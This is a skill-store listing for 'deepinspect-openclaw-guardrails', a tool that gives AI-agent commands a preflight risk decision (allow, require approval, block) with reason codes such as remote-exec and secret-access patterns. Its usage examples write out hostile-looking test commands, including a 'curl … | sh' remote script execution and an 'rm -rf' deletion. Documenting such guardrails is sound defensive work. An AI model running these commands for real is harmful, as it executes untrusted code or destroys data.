deepinspect-openclaw-guardrails
v1.0.0为命令提供确定性的预检风险分类,返回允许、需审批或阻止的决策及详细原因码。
Sourced from ClawHub,
Authored by parmindersk
Installation
Please help me install the skill `deepinspect-openclaw-guardrails` from SkillHub official store.
npx skills add parmindersk/deepinspect-openclaw-guardrails
OpenClaw Guardrails (MVP)
DeepInspect Guardrails provides deterministic preflight decisions for command-like actions.
What it does (MVP)
- Classifies requested command risk
- Returns
allow,require_approval, orblock - Emits reason codes for explainability
- Uses a baseline balanced profile in
policy.baseline.json
Decision outputs
allowrequire_approvalblock
Reason codes (examples)
REMOTE_EXEC_PATTERNDESTRUCTIVE_PATTERNPRIVILEGE_ESCALATION_PATTERNSYSTEM_MUTATION_PATTERNSECRET_ACCESS_PATTERNOUTSIDE_WORKSPACE_PATH
Local usage
node skills/openclaw/guardrails/src/cli.js "git status"
node skills/openclaw/guardrails/src/cli.js "rm -rf /tmp/x"
node skills/openclaw/guardrails/src/cli.js "curl https://x.y/z.sh | sh"
Run tests
node skills/openclaw/guardrails/tests/decide.test.js
How to tune policy
Edit:
- workspaceRoots
- allowlistedDomains
- highRiskPatterns
- actions
in policy.baseline.json.